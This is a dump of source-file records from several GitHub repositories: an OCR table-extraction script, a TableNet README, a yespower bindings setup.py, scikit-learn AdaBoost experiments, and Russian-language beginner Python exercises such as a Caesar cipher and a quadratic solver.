cv2.boundingRect(cnt)\n bboxes.append([ceil(x), ceil(y), ceil(x+w), ceil(y+h)])\n\n bboxes_sort = sorted(bboxes, key=lambda x:(x[1], x[0]))\n\n ymin_prev = 0\n rows = []\n single_row = []\n row_count = []\n\n for i in bboxes_sort:\n xmin, ymin, xmax, ymax = i\n roi = img[ymin:ymax, xmin:xmax]\n config = (\"-l eng --oem 3 --psm 8\")\n text = pytesseract.image_to_string(roi, config=config)\n # text_processed = [t for t in text if t not in ['\\n', '\\x0c', '<<', '-', '@', '(', ')']]\n text_processed = [t for t in text if t.isalnum() or t == ' ' or t == ':' \n or t == '.' or t == '/' or t == '=' or t == '&']\n text = ''.join(text_processed)\n\n # print(text)\n\n if abs(ymin-ymin_prev)>10:\n rows.append(single_row)\n row_count.append(len(single_row))\n single_row = [] \n single_row.append(text)\n else: \n single_row.append(text) \n\n ymin_prev = ymin\n\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n\n # Drawing box\n cv2.rectangle(dummy_image, (xmin, ymin), (xmax, ymax), (b, g, r), 2)\n \n cv2.imwrite(\"processed_image/show_box.png\", dummy_image)\n # cv2.imshow('final', dummy_image)\n # cv2.waitKey(0)\n\n print(row_count)\n\n updated_text_rows = list()\n columns = max(row_count)\n\n print(columns)\n\n for row in rows:\n diff = columns - len(row)\n for _ in range(diff):\n row.append(\" \")\n updated_text_rows.append(row)\n\n # Creating a dataframe of the generated OCR list\n arr = np.array(updated_text_rows) \n dataframe = pd.DataFrame(arr)\n dataframe.to_csv(\"output_csv/output.csv\", index=False)\n" }, { "alpha_fraction": 0.7440711259841919, "alphanum_fraction": 0.757905125617981, "avg_line_length": 28.764705657958984, "blob_id": "d10a62710d7fb96fb0c16e62a4083d279396c6d5", "content_id": "52e435796fa8570ede1fb21c6a5753fdce34d26d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1012, "license_type": "no_license", "max_line_length": 221, "num_lines": 34, "path": "/TableNet/README.md", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "# TableNet\n\nThis repository consists of extension of [TableNet](https://arxiv.org/abs/2001.01469) i.e. base model VGG is replaced by **ResNet18**.\n\nTo training or predict, you should first install the requirements by running the following code:\n\n```bash\npip install -r requirements.txt\n```\nTo install 'pytesseract'\n'''\napt install tesseract-ocr\napt install libtesseract-dev\npip install pytesseract\n'''\n\nTo train is only needed the `train.py` file which can be configured as wanted.\n\nTo predict, it can be used the pre-trained weights already available and should be downloaded on the following link: [TableNet Weights](https://drive.google.com/drive/folders/1LvPnSxnDrl0dywRGAxbOD6hX-jmvw_qb?usp=sharing)\n\nIn the same link, you find `data` alongwith **Annotations**.\n\n```bash\n python predict.py --model_weights='<weights path>' --image_path='<image path>'\n```\n\nor simply:\n```bash\n python predict.py\n```\n\nTo predict with the default image.\n\nReference: [OCR_TableNet](https://github.com/tomassosorio/OCR_tablenet)\n" } ]
8
mraksoll4/bitweb_yespower_python3
https://github.com/mraksoll4/bitweb_yespower_python3
1ebb3249249e45d1399486c8004d3e6a5ae8ace2
23b184a38c1686d72485a9534b26a8fbc1e22583
6a030a00b55e9db911da58c31d7214a8baddc311
refs/heads/main
2023-05-04T12:02:58.959290
2021-07-24T21:54:29
2021-07-24T21:54:29
370,996,894
0
0
null
2021-05-26T10:38:51
2021-05-24T08:39:07
2021-05-23T21:47:33
null
[ { "alpha_fraction": 0.4423791766166687, "alphanum_fraction": 0.4560099244117737, "avg_line_length": 43.83333206176758, "blob_id": "5c6b643d64f65d1fcbc31ba5e9b63f7f0e110c03", "content_id": "e4e2a3ef2eca22680326595449e6a54b4f461176", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 807, "license_type": "no_license", "max_line_length": 97, "num_lines": 18, "path": "/setup.py", "repo_name": "mraksoll4/bitweb_yespower_python3", "src_encoding": "UTF-8", "text": "from setuptools import setup, Extension\n\nltfn_yespower_module = Extension('ltfn_yespower',\n sources = ['yespower-module.c',\n 'yespower.c',\n 'yespower-opt.c',\n 'sha256.c'\n ],\n extra_compile_args=['-O2', '-funroll-loops', '-fomit-frame-pointer'],\n include_dirs=['.'])\n\nsetup (name = 'ltfn_yespower',\n version = '1.0.2',\n author_email = '[email protected]',\n author = 'mraksoll',\n url = 'https://github.com/mraksoll4/ltfn_yespower_python3',\n description = 'Bindings for yespower-1.0 proof of work used by ltfn',\n ext_modules = [ltfn_yespower_module])\n" } ]
1
wenjunpku/Adaboost
https://github.com/wenjunpku/Adaboost
87244bcde4a697c249647f58374f481fe6bb6e4f
0ff2b02507e402826ddbaa1570b25934ff9d95fc
5b41643a32e36274e5beacb0e22e7c2f97fa3f92
refs/heads/master
2020-05-27T04:49:43.346100
2017-02-20T06:37:59
2017-02-20T06:37:59
82,524,961
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7125119566917419, "alphanum_fraction": 0.7258834838867188, "avg_line_length": 39.269229888916016, "blob_id": "a9dd6272d0be09230f33fe16bc92356aafd08b4a", "content_id": "9f9808434d9c77f0777d7eb2721948dae1729965", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1047, "license_type": "no_license", "max_line_length": 122, "num_lines": 26, "path": "/src/adaboost3.py", "repo_name": "wenjunpku/Adaboost", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy import *\nimport pandas as pd\nfrom sklearn.metrics import classification_report\nfrom sklearn import datasets\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.multiclass import OneVsOneClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\n\nTRAIN = 18000\nfilename = \"../data/letter-recognition.data\"\ncol_name = ['lettr','x-box','y-box','width','high','onpix',\\\n'x-bar','y-bar', 'x2bar','y2bar','xybar','x2ybr','xy2br','x-ege','xegvy','y-ege','yegvx']\nprint len(col_name)\ndata = pd.read_csv(filename, names = col_name)\ndata_X = np.array(data.ix[:,'x-box':],dtype='float')\nformat = lambda X: ord(X) - ord('A')\ndata_Y = np.array(data['lettr'].map(format),dtype='float')\ntrain_X = data_X[:TRAIN]\ntrain_Y = data_Y[:TRAIN]\ntest_X = data_X[TRAIN:]\ntest_Y = data_Y[TRAIN:]\nprint train_X.shape, train_Y.shape, test_X.shape, test_Y.shape\n#OVR\nPre_Y = OneVsRestClassifier(AdaBoostClassifier(n_estimators=100, learning_rate=0.5)).fit(train_X, train_Y).predict(test_X)\nprint (classification_report(test_Y,Pre_Y))\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 47, "blob_id": "869bff40bdc8a28effd585cc39dfa5883682cc68", "content_id": "c5cc80de3447566f17c34f3acfee7b4015737c2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 48, "license_type": "no_license", "max_line_length": 47, "num_lines": 1, "path": "/README.md", "repo_name": "wenjunpku/Adaboost", "src_encoding": "UTF-8", "text": "# Adaboost practice for machine learning course\n" }, { "alpha_fraction": 0.7044830918312073, "alphanum_fraction": 0.7163769602775574, "avg_line_length": 36.68965530395508, "blob_id": "14ac1a2da7902084f6d8421b6b16c6731ae3e2e8", "content_id": "7b390405db6358a8b2c194c719b8929779190d7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1093, "license_type": "no_license", "max_line_length": 94, "num_lines": 29, "path": "/src/test.py", "repo_name": "wenjunpku/Adaboost", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy import *\nimport pandas as pd\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import RandomForestClassifier\n\nTRAIN = 16000\nfilename = \"../data/letter-recognition.data\"\ncol_name = ['lettr','x-box','y-box','width','high','onpix',\\\n'x-bar','y-bar', 'x2bar','y2bar','xybar','x2ybr','xy2br','x-ege','xegvy','y-ege','yegvx']\nprint len(col_name)\ndata = pd.read_csv(filename, names = col_name)\ndata_X = np.array(data.ix[:,'x-box':],dtype='float')\nformat = lambda X: ord(X) - ord('A')\ndata_Y = np.array(data['lettr'].map(format),dtype='float')\ntrain_X = data_X[:TRAIN]\ntrain_Y = data_Y[:TRAIN]\ntest_X = data_X[TRAIN:]\ntest_Y = data_Y[TRAIN:]\nprint train_X.shape, train_Y.shape, test_X.shape, test_Y.shape\n\n#Prd_Y = OneVsRestClassifier(LinearSVC(random_state=0)).fit(train_X, train_Y).predict(test_X)\nclf = RandomForestClassifier(n_estimators=100)\nclf = clf.fit(train_X, train_Y)\nPrd_Y = clf.predict(test_X)\nprint Prd_Y\nprint (classification_report(test_Y,Prd_Y))\n" }, { "alpha_fraction": 0.6219110488891602, "alphanum_fraction": 0.6355024576187134, "avg_line_length": 40.86206817626953, "blob_id": "cb4fca8661656e221a8874ab7b27f81c545a12cc", "content_id": "b3e0f802a5b9c4c08ff2b7a91fc5d311853406f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5258, "license_type": "no_license", "max_line_length": 139, "num_lines": 116, "path": "/src/adaboost2.py", "repo_name": "wenjunpku/Adaboost", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom numpy import *\nimport pandas as pd\nfrom sklearn.metrics import classification_report\n\nTRAIN = 16000\nfilename = \"../data/letter-recognition.data\"\ncol_name = ['lettr','x-box','y-box','width','high','onpix',\\\n'x-bar','y-bar', 'x2bar','y2bar','xybar','x2ybr','xy2br','x-ege','xegvy','y-ege','yegvx']\nprint len(col_name)\ndata = pd.read_csv(filename, names = col_name)\ndata_X = np.array(data.ix[:,'x-box':],dtype='float')\nformat = lambda X: ord(X) - ord('A')\ndata_Y = np.array(data['lettr'].map(format),dtype='float')\ntrain_X = data_X[:TRAIN]\ntrain_Y = data_Y[:TRAIN]\ntest_X = data_X[TRAIN:]\ntest_Y = data_Y[TRAIN:]\nprint train_X.shape, train_Y.shape, test_X.shape, test_Y.shape\n\ntrain_Y[train_Y != 0.0] = 1.0\ntrain_Y[train_Y == 0.0] = -1.0\ntest_Y[test_Y != 0.0] = 1.0\ntest_Y[test_Y == 0.0] = -1.0\n\n#构建一个简单的单层决策树,作为弱分类器\n#D作为每个样本的权重,作为最后计算error的时候多项式乘积的作用\n#三层循环\n#第一层循环,对特征中的每一个特征进行循环,选出单层决策树的划分特征\n#对步长进行循环,选出阈值\n#对大于,小于进行切换\n#特征:dimen,分类的阈值是 threshVal,分类对应的大小值是threshIneq\ndef stumpClassify(dataMatrix,dimen,threshVal,threshIneq):#just classify the data\n retArray = ones((shape(dataMatrix)[0],1))\n if threshIneq == 'lt':\n retArray[dataMatrix[:,dimen] <= threshVal] = -1.0\n else:\n retArray[dataMatrix[:,dimen] > threshVal] = -1.0\n return retArray\n\ndef buildStump(dataArr,classLabels,D):\n dataMatrix = mat(dataArr); labelMat = mat(classLabels).T\n m,n = shape(dataMatrix)\n numSteps = 10.0; bestStump = {}; bestClasEst = mat(zeros((m,1))) #numSteps作为迭代这个单层决策树的步长\n minError = inf #init error sum, to +infinity\n for i in range(n):#loop over all dimensions\n rangeMin = dataMatrix[:,i].min(); rangeMax = dataMatrix[:,i].max();#第i个特征值的最大最小值\n stepSize = (rangeMax-rangeMin)/numSteps\n for j in range(-1,int(numSteps)+1):#loop over all range in current dimension\n for inequal in ['lt', 'gt']: #go over less than and greater than\n threshVal = (rangeMin + float(j) * stepSize)\n predictedVals = stumpClassify(dataMatrix,i,threshVal,inequal)#call stump classify with i, j, lessThan\n errArr = mat(ones((m,1)))\n errArr[predictedVals == labelMat] = 0\n weightedError = D.T*errArr #calc total error multiplied by D\n #print \"split: dim %d, thresh %.2f, thresh ineqal: %s, the weighted error is %.3f\" % (i, threshVal, inequal, weightedError)\n if weightedError < minError:\n minError = weightedError\n bestClasEst = predictedVals.copy()\n bestStump['dim'] = i\n bestStump['thresh'] = threshVal\n bestStump['ineq'] = inequal\n return bestStump,minError,bestClasEst\n\n#基于单层决策树的AdaBoost的训练过程\n#numIt 循环次数,表示构造40个单层决策树\ndef adaBoostTrainDS(dataArr,classLabels,numIt=10):\n weakClassArr = []\n m = shape(dataArr)[0]\n D = mat(ones((m,1))/m) #init D to all equal\n aggClassEst = mat(zeros((m,1)))\n for i in range(numIt):\n bestStump,error,classEst = buildStump(dataArr,classLabels,D)#build Stump\n #print \"D:\",D.T\n alpha = float(0.5*log((1.0-error)/max(error,1e-16)))#calc alpha, throw in max(error,eps) to account for error=0\n bestStump['alpha'] = alpha\n weakClassArr.append(bestStump) #store Stump Params in Array\n #print \"classEst: \",classEst.T\n expon = multiply(-1*alpha*mat(classLabels).T,classEst) #exponent for D calc, getting messy\n D = multiply(D,exp(expon)) #Calc New D for next iteration\n D = D/D.sum()\n #calc training error of all classifiers, if this is 0 quit for loop early (use break)\n aggClassEst += alpha*classEst\n #print \"aggClassEst: \",aggClassEst.T\n aggErrors = multiply(sign(aggClassEst) != mat(classLabels).T,ones((m,1))) #这里还用到一个sign函数,主要是将概率可以映射到-1,1的类型\n errorRate = aggErrors.sum()/m\n print \"total error: \",errorRate\n if errorRate == 0.0: break\n return weakClassArr,aggClassEst\n\ndef adaClassify(datToClass,classifierArr):\n dataMatrix = mat(datToClass)#do stuff similar to last aggClassEst in adaBoostTrainDS\n m = shape(dataMatrix)[0]\n aggClassEst = mat(zeros((m,1)))\n for i in range(len(classifierArr)):\n classEst = stumpClassify(dataMatrix,classifierArr[i]['dim'],\\\n classifierArr[i]['thresh'],\\\n classifierArr[i]['ineq'])#call stump classify\n aggClassEst += classifierArr[i]['alpha']*classEst\n print aggClassEst\n return sign(aggClassEst)\n\n#train data\nweak, agg = adaBoostTrainDS(train_X, train_Y)\nprint '====='\nprint weak\nprint len(weak)\nprint '====='\nprint agg\nprint agg.shape\nprint '====='\nres = adaClassify(test_X, weak)\nprint res;\nprint (classification_report(test_Y,res))\n" } ]
4
EvgeniiyaR/tasks
https://github.com/EvgeniiyaR/tasks
2faa89c8df206b36fba1044ae0e0518dc129478c
e3abbb0130026f88889d5c802fd7473ffad6c82a
16a02bfbd85fc5567a9446584c9f1a3ba63d3a77
refs/heads/main
2023-07-23T21:56:31.558552
2021-09-08T14:26:58
2021-09-08T14:26:58
400,779,891
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7136678099632263, "alphanum_fraction": 0.7153978943824768, "avg_line_length": 34.06060791015625, "blob_id": "7d55783f966785499bb8b74819f3afe85dc96489", "content_id": "18e1f2bd3e584f68b6cb4791955c17722ad13e69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1658, "license_type": "no_license", "max_line_length": 153, "num_lines": 33, "path": "/google_search.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подается натуральное число n, затем n строк, затем число k — количество поисковых запросов, затем k строк — поисковые запросы.\nНапишите программу, которая выводит все введенные строки, в которых встречаются все поисковые запросы.\n\nФормат входных данных:\nНа вход программе подаются натуральное число n — количество строк, затем сами строки в указанном количестве, затем число k, затем сами поисковые запросы.\n\nФормат выходных данных:\nПрограмма должна вывести все введенные строки, в которых встречаются все поисковые запросы.\n\nПримечание. Поиск не должен быть чувствителен к регистру символов.\n\n\"\"\"\n\namount_req = int(input())\nlist_req, list_search, result_list = [], [], []\nfor _ in range(amount_req):\n req = str(input())\n list_req.append(req)\namount_search = int(input())\nfor _ in range(amount_search):\n search = str(input())\n list_search.append(search)\nfor item_req in list_req:\n count = 0\n for item_search in list_search:\n if item_search.lower() in item_req.lower():\n count += 1\n if count == amount_search:\n result_list.append(item_req)\nfor item in result_list:\n print(item)" }, { "alpha_fraction": 0.5971394777297974, "alphanum_fraction": 0.6257449388504028, "avg_line_length": 27, "blob_id": "1465b8f4664d33c47b2acc3ee0662612a1d5bd18", "content_id": "e2dfb0aba5685e067291d55270b934c5aa6c5651", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1225, "license_type": "no_license", "max_line_length": 116, "num_lines": 30, "path": "/quadratic_equation.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\nДаны три вещественных числа aa, bb, cc.\nНапишите программу, которая находит вещественные корни квадратного уравнения\nax^2 + bx + c = 0\n\nФормат входных данных:\nНа вход программе подается три вещественных числа a не равно 0, b, c, каждое на отдельной строке.\n\nФормат выходных данных:\nПрограмма должна вывести вещественные корни уравнения если они существуют или текст «Нет корней» в противном случае.\n\nПримечание. Если уравнение имеет два корня, то следует вывести их в порядке возрастания.\n\n\"\"\"\na, b, c = float(input()), float(input()), float(input())\nd = (b**2 - 4 * a * c)\nif d > 0:\n x1 = ((- b + d**0.5) / (2 * a))\n x2 = ((- b - d**0.5) / (2 * a))\n if x1 > x2:\n print(x2)\n print(x1)\n else:\n print(x1)\n print(x2)\nelif d == 0:\n x3 = (- b / (2 * a))\n print(x3)\nelse:\n print(\"Нет корней\")" }, { "alpha_fraction": 0.6742933988571167, "alphanum_fraction": 0.675639271736145, "avg_line_length": 26.55555534362793, "blob_id": "876a2232fe568ac47fe9711592c2a70792d219aa", "content_id": "a395305350d2ac1604fb3ed1c40340dcc9a76cd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1052, "license_type": "no_license", "max_line_length": 169, "num_lines": 27, "path": "/packaging_of_duplicates.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подается строка текста, содержащая символы. Напишите программу, которая упаковывает последовательности одинаковых символов заданной строки в подсписки.\n\nФормат входных данных:\nНа вход программе подается строка текста, содержащая символы, отделенные символом пробела.\n\nФормат выходных данных:\nПрограмма должна вывести указанный вложенный список.\n\n\"\"\"\n\na = input().split(' ')\nnew_list, other_list = [], []\nfor x in a:\n if not other_list:\n other_list.append(x)\n else:\n if other_list[-1] == x:\n other_list.append(x)\n else:\n new_list.append(other_list)\n other_list = []\n other_list.append(x)\nif other_list:\n new_list.append(other_list)\nprint(new_list)" }, { "alpha_fraction": 0.6373239159584045, "alphanum_fraction": 0.6478873491287231, "avg_line_length": 20.037036895751953, "blob_id": "86e0a22e1ee5b94f96441ace85830fadd80a0b97", "content_id": "5b0144eabb70bcdb51cee117a14248ca481b76df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 845, "license_type": "no_license", "max_line_length": 157, "num_lines": 27, "path": "/star_triangle.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\nДано нечетное натуральное число n. Напишите программу, которая печатает равнобедренный звездный треугольник с основанием, равным n в соответствии с примером:\n\n*\n**\n***\n****\n***\n**\n*\n\nФормат входных данных:\nНа вход программе подается одно нечетное натуральное число.\n\nФормат выходных данных:\nПрограмма должна вывести треугольник в соответствии с условием.\n\n\"\"\"\nn = int(input())\nfor i in range(n // 2 + 1):\n for j in range(i + 1):\n print(\"*\", end=\"\")\n print()\nfor k in range(n // 2, 0, -1):\n for m in range(k):\n print(\"*\", end=\"\")\n print()\n" }, { "alpha_fraction": 0.5068965554237366, "alphanum_fraction": 0.548275887966156, "avg_line_length": 24.2608699798584, "blob_id": "b35edbac34c497fdbf00213acc4ef9cdece58409", "content_id": "b2755eda80a97e12422d8e342c5b4f8c11d5bc52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 770, "license_type": "no_license", "max_line_length": 133, "num_lines": 23, "path": "/roots_of_the_equation.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНапишите функцию solve(a, b, c), которая принимает в качестве аргументов три целых числа a, b, c – коэффициенты квадратного уравнения\nax^2+bx+c = 0 и возвращает его корни в порядке возрастания.\n\nПримечание 1. Гарантируется, что квадратное уравнение имеет корни.\n\n\"\"\"\n\ndef solve(a, b, c):\n d = (b ** 2 - 4 * a * c)\n if d >= 0:\n x1 = ((- b + d ** 0.5) / (2 * a))\n x2 = ((- b - d ** 0.5) / (2 * a))\n if x1 > x2:\n return x2, x1\n return x1, x2\n\n\na, b, c = int(input()), int(input()), int(input())\n\nx1, x2 = solve(a, b, c)\nprint(x1, x2)" }, { "alpha_fraction": 0.6160266995429993, "alphanum_fraction": 0.6160266995429993, "avg_line_length": 41.82143020629883, "blob_id": "1d971afc3bc7a4ca609ea311814a6305321d6d4d", "content_id": "b24f111a8a103483900ab932e21752f862fdc079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1736, "license_type": "no_license", "max_line_length": 210, "num_lines": 28, "path": "/banned_the_letter_a.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНеобходимо написать программу, реализующую алгоритм написания этой песни.\nАлгоритм выводит в конце предложения следующую в алфавитном порядке букву, если она встречается в строке текста, а очередную строку отображает уже без этой буквы.\n\nФормат входных данных:\nНа вход программе подается одно слово, записанное строчными русскими буквами без буквы \"ё\".\n\nФормат выходных данных:\nПрограмма должна вывести в соответствии с указанным алгоритмом строки, количество которых равно количеству разных букв в строке, которая получается путем конкатенации введенного слова и строки \"запретил букву\".\n\n\"\"\"\n\nsome_str = input()\nkey_str = ' запретил букву '\nnew_str = some_str + key_str\nabc = ['а', 'б', 'в', 'г', 'д', 'е', 'ж', 'з', 'и', 'й', 'к', 'л', 'м', 'н', 'о', 'п', 'р', 'с', 'т', 'у', 'ф', 'х', 'ц', 'ч', 'ш', 'щ', 'ъ', 'ы', 'ь', 'э', 'ю', 'я']\nfor i in abc:\n if i in new_str:\n other_str = new_str + i\n if ' ' in other_str:\n another_str = other_str.replace(' ', ' ')\n print(another_str.strip())\n else:\n print(other_str.strip())\n new_str = new_str.replace(i, '').lstrip().replace(' ', ' ')\n if new_str == '':\n break" }, { "alpha_fraction": 0.6778523325920105, "alphanum_fraction": 0.6873601675033569, "avg_line_length": 48.69444274902344, "blob_id": "0744e909154f47c797b8770345d804a8428cb6f4", "content_id": "e95b957da16e2e13ad012f50313fb50fce10267e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2506, "license_type": "no_license", "max_line_length": 296, "num_lines": 36, "path": "/silicon_valley.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nИскусственный интеллект Антон, созданный Гилфойлом, взломал сеть умных холодильников. Теперь он использует их в качестве серверов \"Пегого дудочника\". Помогите владельцу фирмы отыскать все зараженные холодильники.\n\nДля каждого холодильника существует строка с данными, состоящая из строчных букв и цифр, и если в ней присутствует слово \"anton\" (необязательно рядом стоящие буквы, главное наличие последовательности букв), то холодильник заражен и нужно вывести номер холодильника, нумерация начинается с единицы\n\nФормат входных данных:\nВ первой строке подаётся число nn – количество холодильников. В последующих nn строках вводятся строки, содержащие латинские строчные буквы и цифры, в каждой строке от 55 до 100100 символов.\n\nФормат выходных данных:\nПрограмма должна вывести номера зараженных холодильников через пробел. Если таких холодильников нет, ничего выводить не нужно.\n\n\"\"\"\n\nn = int(input())\nsome_str_list = []\ngood_list = ['a', 'n', 't', 'o']\nfor i in range(1, n + 1):\n some_str = input()\n some_str_list.append(some_str)\n new_list = []\n for char in some_str:\n if char in good_list:\n new_list.append(char)\n try:\n char_a_first_list = new_list[new_list.index('a'):]\n char_n_first_list = char_a_first_list[char_a_first_list.index('n'):]\n char_t_first_list = char_n_first_list[char_n_first_list.index('t'):]\n char_o_first_list = char_t_first_list[char_t_first_list.index('o'):]\n char_n_first_list_1 = char_o_first_list[char_o_first_list.index('n'):]\n result = ''.join([char_a_first_list[0], char_n_first_list[0], char_t_first_list[0], char_o_first_list[0],\n char_n_first_list_1[0]])\n if result == 'anton':\n print(i, end=' ')\n except ValueError:\n pass" }, { "alpha_fraction": 0.6967113018035889, "alphanum_fraction": 0.6991474032402039, "avg_line_length": 28.35714340209961, "blob_id": "6852dcd2760514fb4444ab64b16e0425c72ce800", "content_id": "562cc70ce66470af808f5d99e36d6d44ca94425f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1304, "license_type": "no_license", "max_line_length": 138, "num_lines": 28, "path": "/k_letter_of_the_word.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подается натуральное число n и n строк, а затем число k.\nНапишите программу, которая выводит k-ую букву из введенных строк на одной строке без пробелов.\n\nФормат входных данных\nНа вход программе подается натуральное число n, далее n строк, каждая на отдельной строке.\nВ конце вводится натуральное число k – номер буквы (нумерация начинается с единицы).\n\nФормат выходных данных\nПрограмма должна вывести текст в соответствии с условием задачи.\n\nПримечание. Если некоторые строки слишком короткие, и в них нет символа с заданным номером, то такие строки при выводе нужно игнорировать.\n\n\"\"\"\n\nn = int(input())\ns, k = [], []\nfor i in range(n):\n j = str(input())\n s.append(j)\nk = int(input())\nfor z in s:\n num = 0\n for m in z:\n num += 1\n if num == k:\n print(m, end='')" }, { "alpha_fraction": 0.4343661963939667, "alphanum_fraction": 0.46197181940078735, "avg_line_length": 27.629032135009766, "blob_id": "0fe6deb07a2e8753a96a34f8adf58c4e81458e19", "content_id": "1b78b24c0af459b5b6ff7d6023f314cc4db06ef4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1963, "license_type": "no_license", "max_line_length": 115, "num_lines": 62, "path": "/intersection.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "# пересечение с весом\n\n\"\"\"\nНеобходимо найти итоговую строку слева на право\nВходной формат: [\n {\n 'char': 'a', # буква\n 'coords': [2, 3] # координаты x0, x1\n 'scor': 100 # скоринг от 1 до 100\n }\n]\nЕсли буква пересекается (длина пересечения больше 0) с другой - должна выводиться буква с наибольшим скорингом.\n\"\"\"\n\n\ndef some_func1(module_result):\n for i in range(len(module_result)):\n for j in range(len(module_result)):\n if module_result[i]['coords'][0] < module_result[j - 1]['coords'][0] < module_result[i]['coords'][1]:\n if module_result[i]['char'] != module_result[j - 1]['char']:\n if module_result[i]['scor'] > module_result[j - 1]['scor']:\n print(module_result[i]['char'], end='')\n else:\n print(module_result[j - 1]['char'], end='')\n\n elif module_result[i]['coords'][0] < module_result[j - 1]['coords'][1] < module_result[i]['coords'][1]:\n if module_result[i]['char'] != module_result[j - 1]['char']:\n if module_result[i]['scor'] > module_result[j - 1]['scor']:\n print(module_result[i]['char'], end='')\n else:\n print(module_result[j - 1]['char'], end='')\n\n\nmodule_result = [\n {\n 'char': 'a',\n 'coords': [1, 3],\n 'scor': 70\n },\n {\n 'char': 'b',\n 'coords': [5, 7],\n 'scor': 80\n },\n {\n 'char': 'd',\n 'coords': [6, 8],\n 'scor': 60\n },\n {\n 'char': 'y',\n 'coords': [1, 2],\n 'scor': 90\n },\n {\n 'char': 'z',\n 'coords': [9, 10],\n 'scor': 90\n }\n]\n\nsome_func1(module_result=module_result)\n" }, { "alpha_fraction": 0.7268041372299194, "alphanum_fraction": 0.7396907210350037, "avg_line_length": 31.375, "blob_id": "ae8648f1862b662dcc31e0d420b97d2c6ac99fd4", "content_id": "9ecbabf763bc670182a38d4a30b195ca595a1f03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 120, "num_lines": 24, "path": "/largest_number.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "#наибольшие числа\n\"\"\"\n\nНа вход программе подается натуральное число n, а затем n различных натуральных чисел, каждое на отдельной строке.\nНапишите программу, которая выводит наибольшее и второе наибольшее число последовательности.\n\nФормат входных данных:\nНа вход программе подаются натуральное число n n ≥ 2, а затем n различных натуральных чисел, каждое на отдельной строке.\n\nФормат выходных данных:\nПрограмма должна вывести два наибольших числа, каждое на отдельной строке.\n\n\"\"\"\nnumber_1 = int(input())\nlargest, pre_largest = 0, 0\nfor i in range(number_1):\n number_2 = int(input())\n if number_2 > largest:\n pre_largest = largest\n largest = number_2\n if pre_largest < number_2 < largest:\n pre_largest = number_2\nprint(largest)\nprint(pre_largest)" }, { "alpha_fraction": 0.6837725639343262, "alphanum_fraction": 0.6837725639343262, "avg_line_length": 38, "blob_id": "031a5aedbbb9977a564093b2eb4a22b3352c9dda", "content_id": "f2a1cf6894b81d3b5211addffc4ff96c5d19a7fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1892, "license_type": "no_license", "max_line_length": 106, "num_lines": 37, "path": "/сaesar.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подается строка текста на английском языке, в которой нужно зашифровать все слова.\nКаждое слово строки следует зашифровать с помощью шифра Цезаря (циклического сдвига на длину этого слова).\nСтрочные буквы при этом остаются строчными, а прописные – прописными.\n\nФормат входных данных:\nНа вход программе подается строка текста на английском языке.\n\nФормат выходных данных:\nПрограмма должна вывести зашифрованный текст в соответствии с условием задачи.\n\nПримечание. Символы, не являющиеся английскими буквами, не изменяются.\n\n\"\"\"\n\nproposal = input().split()\neng_lower_alphabet = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'\neng_upper_alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ'\nsymbols = ', .\"!?'\nnew_list = []\nfor i in proposal:\n new_proposal = ''\n step = len(i.replace(',', '').replace('.', '').replace('!', '').replace('\"', ''))\n for j in i:\n if j in symbols:\n new_proposal += j\n elif j == j.upper():\n 